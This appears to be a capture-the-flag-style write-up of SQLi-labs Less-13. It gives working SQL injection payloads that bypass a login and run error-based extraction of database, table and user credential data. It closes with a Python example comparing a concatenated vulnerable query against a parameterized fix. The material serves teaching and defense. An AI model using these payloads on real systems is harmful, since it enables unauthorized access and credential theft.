Less-13: POST + boolean blind injection
First capture the request with Burp Suite to get the message body:
Then inject using the HackBar plugin:
Determine the closing syntax:
uname=') or 1=1 #&passwd=&submit=Submit
This shows that the closing syntax is ('').
uname='))#&passwd=&submit=Submit
This level has no data echo, only a success/failure result and error messages, so boolean blind, time-based or error-based injection can all be used; here we use error-based injection.
Determine the number of columns:
uname=') group by 3 #&passwd=&submit=Submit    returns an error,
uname=') group by 2 #&passwd=&submit=Submit    returns no error, so there are 2 columns.
Get the current database:
uname=') union select count(*),concat(database(),'/',floor(rand(0)*2))x from information_schema.columns group by x #&passwd=&submit=Submit
Get all databases:
uname=') union select count(*),concat((select group_concat(schema_name) from information_schema.schemata),'/',floor(rand(0)*2))x from information_schema.schemata group by x#&passwd=&submit=Submit
Get the tables in the security database:
(Here, combining select with group_concat simply shows a successful login, so switch to limit and output them one at a time)
uname=') union select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x -- #&passwd=&submit=Submit
Get the columns of the users table:
(Here select and group_concat can be combined again)
uname=') union select count(*),concat((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x26,floor(rand(0)*2))x from information_schema.columns group by x #&passwd=&submit=Submit
Query the username column:
(Here select and group_concat again cannot be combined; only limit works)
uname=') union select count(*),concat((select username from users limit 0,1),0x26,floor(rand(0)*2))x from security.users group by x #&passwd=&submit=Submit
Query the password column:
uname=') union select count(*),concat((select password from users limit 0,1),0x26,floor(rand(0)*2))x from security.users group by x #&passwd=&submit=Submit
Output username and password joined together:
(Likewise, group_concat cannot be used to output them together)
uname=') union select count(*),concat((select concat_ws('~',username,password) from users limit 0,1),0x26,floor(rand(0)*2))x from security.users group by x #&passwd=&submit=Submit
To be continued...
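Why the closing-syntax probes above behave as they do, and what fixes the level, is easiest to see side by side. The following is an added example, not the lab's own PHP: a Python/sqlite3 stand-in whose query mirrors the ('...') shape the write-up identifies (an assumption about the lab's query), a constructed users table, and the same login written with bound parameters. The lab runs MySQL, where # ends a comment; sqlite only understands --, so the probes use -- here.

```python
import sqlite3

# Constructed sample data standing in for the lab's security.users table.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
_conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                  [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "admin", "admin")])


def login_vulnerable(uname, passwd):
    """Builds the WHERE clause by string concatenation in the ('...') shape
    (assumed to match the lab). Returns the matched row plus any SQL error
    text: the write-up reads exactly that error/no-error difference as its
    oracle, and an unbalanced ')' is what makes the '))' probe fail."""
    sql = ("SELECT username, password FROM users "
           f"WHERE username=('{uname}') AND password=('{passwd}') LIMIT 0,1")
    try:
        return {"row": _conn.execute(sql).fetchone(), "error": None}
    except sqlite3.Error as exc:
        return {"row": None, "error": str(exc)}


def login_safe(uname, passwd):
    """Same lookup with bound parameters: the input is data, never SQL,
    so neither the closing-syntax probes nor 'or 1=1' change the query."""
    sql = ("SELECT username, password FROM users "
           "WHERE username=? AND password=? LIMIT 0,1")
    return _conn.execute(sql, (uname, passwd)).fetchone()


if __name__ == "__main__":
    print(login_vulnerable("') or 1=1 -- ", ""))   # a row: login bypassed
    print(login_vulnerable("')) -- ", ""))         # SQL error: the oracle
    print(login_safe("') or 1=1 -- ", ""))         # None: treated as a literal
```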